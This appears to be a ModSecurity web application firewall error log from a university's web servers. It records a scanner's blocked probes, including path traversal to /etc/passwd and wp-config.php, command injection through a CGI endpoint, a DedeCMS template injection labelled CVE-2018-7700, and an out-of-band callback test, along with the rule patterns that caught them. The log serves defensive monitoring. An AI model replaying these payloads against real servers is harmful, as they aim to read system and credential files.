[Tue Aug 29 11:46:55.114989 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjcHVoAAAAY"]
[Tue Aug 29 11:46:55.157455 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAjcHVwAAAAY"]
[Tue Aug 29 11:46:55.999695 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/execute_cmd.cgi"] [unique_id "ZO14P8Co-f0AAAhzvoUAAAAx"]
[Tue Aug 29 11:47:00.493676 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjZRX4AAAAS"]
[Tue Aug 29 11:47:00.495187 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAhBSKwAAAAX"]
[Tue Aug 29 11:47:00.495949 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjcHWoAAAAY"]
[Tue Aug 29 11:47:00.512916 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RMCo-f0AAAjZRX8AAAAS"]
[Tue Aug 29 11:47:01.352100 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjIhmYAAAAJ"]
[Tue Aug 29 11:47:01.391979 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjdQLAAAAAZ"]
[Tue Aug 29 11:47:01.396741 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAfECBkAAAAO"]
[Tue Aug 29 11:47:01.397984 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAhT39YAAAAD"]
[Tue Aug 29 11:47:01.398861 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAhtjpUAAAAq"]
[Tue Aug 29 11:47:01.412329 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RcCo-f0AAAjcHW0AAAAY"]
[Tue Aug 29 11:47:01.423650 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14RcCo-f0AAAjL8SgAAAAR"]
[Tue Aug 29 11:47:02.408158 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjKyuoAAAAQ"]
[Tue Aug 29 11:47:02.417393 2023] [:error] [pid 2263] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjXsgEAAAAG"]
[Tue Aug 29 11:47:02.466059 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjM7B4AAAAT"]
[Tue Aug 29 11:47:02.486024 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAjM7B8AAAAT"]
[Tue Aug 29 11:47:02.536328 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14RsCo-f0AAAcsLdMAAAAE"]
[Tue Aug 29 11:47:02.566702 2023] [:error] [pid 2263] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZO14RsCo-f0AAAjXsgcAAAAG"]
[Tue Aug 29 11:47:03.400265 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAi-RI0AAAAH"]
[Tue Aug 29 11:47:03.400323 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjM7CUAAAAT"]
[Tue Aug 29 11:47:03.407876 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAjIhmsAAAAJ"]
[Tue Aug 29 11:47:03.433187 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:partcode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);{/ found within ARGS:partcode: {dede:field name='source' runphp='yes'}echo md5(\\x22CVE-2018-7700\\x22);{/dede:field}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tag_test_action.php"] [unique_id "ZO14R8Co-f0AAAjIhmwAAAAJ"]
[Tue Aug 29 11:47:03.456891 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAi-RI8AAAAH"]
[Tue Aug 29 11:47:03.487262 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14R8Co-f0AAAhzvp4AAAAx"]
[Tue Aug 29 11:47:04.429881 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:likebtn_q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:likebtn_q: aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14SMCo-f0AAAjM7CsAAAAT"]
[Tue Aug 29 11:47:05.393227 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjkM0gAAAAI"]
[Tue Aug 29 11:47:05.405051 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAhzvqEAAAAx"]
[Tue Aug 29 11:47:05.406086 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAcsLdwAAAAE"]
[Tue Aug 29 11:47:05.473323 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAjN0SEAAAAU"]
[Tue Aug 29 11:47:05.490561 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/download"] [unique_id "ZO14ScCo-f0AAAcsLd4AAAAE"]
[Tue Aug 29 11:47:06.363507 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:filename: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download"] [unique_id "ZO14SsCo-f0AAAjW9BkAAAAA"]
[Tue Aug 29 11:47:06.364332 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjkM0sAAAAI"]
[Tue Aug 29 11:47:06.364401 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjkM0sAAAAI"]
[Tue Aug 29 11:47:06.367517 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjCbCUAAAAB"]
[Tue Aug 29 11:47:06.367587 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjCbCUAAAAB"]
[Tue Aug 29 11:47:06.431225 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXMAAAAY"]
[Tue Aug 29 11:47:06.431301 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXMAAAAY"]
[Tue Aug 29 11:47:06.500290 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjcHXUAAAAY"]
